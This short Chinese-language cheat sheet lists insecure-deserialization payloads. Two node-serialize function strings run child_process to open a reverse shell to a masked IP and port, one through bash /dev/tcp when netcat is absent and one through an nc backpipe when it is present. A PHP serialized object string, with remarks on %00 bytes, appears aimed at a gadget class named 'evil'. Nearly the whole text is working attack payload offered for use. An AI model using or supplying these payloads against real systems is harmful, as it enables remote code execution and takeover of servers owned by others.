这个是没有安装 netcat的nodejs的反序列化代码
_$$ND_FUNC$$_function (){\n require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/*.*.*.*/port 0>&1\"', function puts(error, stdout, stderr) {});\n}()
安装 netcat的nodejs的反序列化代码
_$$ND_FUNC$$_function (){require('child_process').exec('mknod backpipe p; nc *.*.*.* port 0<backpipe | /bin/bash ]>backpipe')}()
反序列化php生成的代码,会存在%00问题
方框其实就是%00,
O:5:"lemon":1:{s:11:"%00*%00ClassObj";O:4:"evil":1:{s:10:"%00evil%00data";N;}}